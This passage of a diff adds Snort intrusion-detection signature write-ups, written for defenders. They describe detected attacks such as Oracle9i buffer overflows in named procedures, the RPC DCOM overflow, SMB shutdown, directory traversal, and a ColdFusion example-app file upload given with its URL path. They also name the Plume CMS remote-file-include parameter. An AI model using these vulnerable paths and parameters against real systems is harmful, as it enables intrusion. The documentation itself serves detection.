+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
--- /dev/null
+++ b/doc/signatures/880.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+880
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/403.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+403
+
+--
+
+Summary:
+This event is generated when An ICMP Precedence Cutoff In Effect datagram is detected on the network.  
+
+--
+
+Impact:
+Routers will generate this message when a minimum precedence level has been configured for the network.  This could be an indication of improperly configured routing equipment or network host.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/snort-sid-template.txt
@@ -0,0 +1,48 @@
+# This is a template for submitting snort signature descriptions to
+# the snort.org website
+#
+# Ensure that your descriptions are your own
+# and not the work of others.  References in the rules themselves
+# should be used for linking to other's work. 
+#
+# If you are unsure of some part of a rule, use that as a commentary
+# and someone else perhaps will be able to fix it.
+# 
+# $Id: snort-sid-template.txt,v 1.1 2002/10/09 13:06:31 cazz Exp $
+#
+# 
+
+Rule:  
+
+--
+Sid:
+
+--
+Summary:
+
+--
+Impact:
+
+--
+Detailed Information:
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+
+--
+False Positives:
+
+--
+False Negatives:
+
+--
+Corrective Action:
+
+--
+Contributors:
+
+-- 
+Additional References:
--- /dev/null
+++ b/doc/signatures/1449.txt
@@ -0,0 +1,70 @@
+Rule:
+  
+--
+Sid:
+1449
+
+--
+
+Summary:
+This event is generated when an attempt is made to log on anonymously to an ftp server.
+
+--
+
+Impact:
+Information gathering, further exploit/abuse possible.
+
+--
+
+Detailed Information:
+Anonymous logins are usually the first step in the process of gathering 
+data about a machine running the ftp server. The ftp server might be 
+abused for hosting illegal content or an exploit could be performed, 
+gaining elevated privileges.
+
+--
+
+Affected Systems:
+Machines running anonymous ftp servers.
+
+--
+
+Attack Scenarios:
+The attacker can run an automated script over a range of IP addresses to
+detect ftp servers that allow anonymous access and create a list of such
+servers, to be used later.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+If the ftp server allows anonymous login to occur, this rule will 
+generate an event.
+
+--
+
+False Negatives:
+Attacker might use a username 'anonymous' instead of 'ftp' to gain 
+anonymous access.
+
+--
+
+Corrective Action:
+Disable anonymous access on your ftp server.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2696.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2696
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure is_master
+. This procedure is included in
+sys.dbms_repcat_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1722.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1722
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2943.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2943
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2883.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2883
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_unique_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3337.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3337
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1058.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1058
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+NGS Whitepaper - Advanced SQL Injection
+www.nextgenss.com/papers/advanced_sql_injection.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/3318.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3318
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000747.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000747
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Plume CMS" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "_PX_config[manager_path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "_PX_config[manager_path]" parameter in the "index.php" script used by the "Plume CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Plume CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3208.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3208
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1947.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1947
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/905.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+905
+
+--
+Summary:
+This event is generated when an attempt is made to access an Example 
+application on a Coldfusion 4.x server. 
+
+This 'Web Publish Example Script' can be exploited to allow the attacker
+to upload arbitrary files to the server.
+
+--
+Impact:
+Serious: The vulnerability allows custom code to be uploaded to the 
+server.
+
+--
+Detailed Information:
+ColdFusion (Macromedia, formerly Allaire) web servers have several 
+default Example applications installed that have vulnerabilities.  The 
+'Web Publish Example script' application can be exploited to allow the 
+uploading of arbitrary files.
+
+See Macromedia Security Bulletin (MPSB01-08) for complete information.
+
+
+--
+Affected Systems:
+	ColdFusion versions 2.x, 3.x, 4.x for Windows
+	ColdFusion versions 4.x for Solaris, HP-UX
+	ColdFusion versions 4.5.x for Linux
+	Expression Evaluator Patch (ASB99-01)
+
+--
+Attack Scenarios:
+The web application allows file uploading via a URL like this:
+
+http://www.target.com/CFDOCS/exampleapps/publish/admin/application.cfm
+
+Once the file has been uploaded, it can be executed by crafting a 2nd 
+URL to the uploaded file.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If ColdFusion 4.x's example code is being used, This rule will generate 
+an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Delete all example code.  This is one of several significant 
+vulnerabilities that are exploitable if the example code is left on a 
+production server.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Darryl Davidson <ddavidson@talisman-intl.com>
+
+-- 
+Additional References:
+
+Macromedia Security Bulletin (MPSB01-08)
+http://www.macromedia.com/devnet/security/security_zone/mpsb01-08.html
+
+--
--- /dev/null
+++ b/doc/signatures/2791.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2791
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure purge_flavor_definition
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2703.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+2703
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+--
+Affected Systems:
+	Oracle iSQLPlus
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1822.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1822
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2983.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2983
+
+--
+Summary:
+This event is generated when an attempt is made to access the ADMIN$
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
--- /dev/null
+++ b/doc/signatures/2571.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2571
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential 
+weakness on a host running a web application on Microsoft Internet 
+Information Server (IIS).
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential 
+weaknesses in a host running a web application on Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation
+on the host, this may be the prelude to an attack against that host 
+using that information.
+
+The attacker may also be trying to gain administrator access to the 
+host, garner information on users of the system or retrieve sensitive 
+customer information.
+
+Some applications may store sensitive information such as database 
+connections, user information, passwords and customer information in 
+files accessible via a web interface. Care should be taken to ensure 
+these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been 
+taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2753.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2753
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_repsites
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1026.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1026
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
